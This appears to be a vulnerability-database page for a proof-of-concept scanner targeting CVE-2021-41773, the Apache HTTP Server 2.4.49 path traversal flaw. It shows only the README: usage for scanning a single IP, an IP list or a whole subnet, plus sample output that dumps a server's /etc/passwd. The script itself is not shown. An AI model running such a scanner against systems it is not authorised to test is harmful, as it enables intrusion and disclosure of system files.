CVE-2021-41773 PoC — Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Source

Associated Vulnerability

Readme

# CVE-2021-41773
Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

This script test Apache HTTP Server 2.4.49

## Usage: 

CVE-2021-41773.py options

- Only for one IP: python CVE-2021-41773.py IP_address
- Option -f For IP list in file
         Example: python CVE-2021-41773.py -f IP_address_list_filename
- Option -s For IP subnet
         Example: python CVE-2021-41773.py -s 192.168.1.0/24


## Output

```
python CVE-2021-41773.py AAA.BBB.CCC.DDD
Server AAA.BBB.CCC.DDD IS VULNERABLE
The output is:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:998:997:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:997:995:MySQL server:/var/lib/mysql:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:995:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
darkerc:x:1000:1000::/home/darkerc:/sbin/nologin
toranon:x:986:983:Tor anonymizing user:/var/lib/tor:/sbin/nologin
nginx:x:985:982:nginx user:/var/cache/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
```

File Snapshot

 [4.0K]  /data/pocs/3dd36e142e046b9106f03d32deabcadd99293468
├── [2.6K]  CVE-2021-41773.py
└── [2.0K]  README.md

0 directories, 2 files

Remarks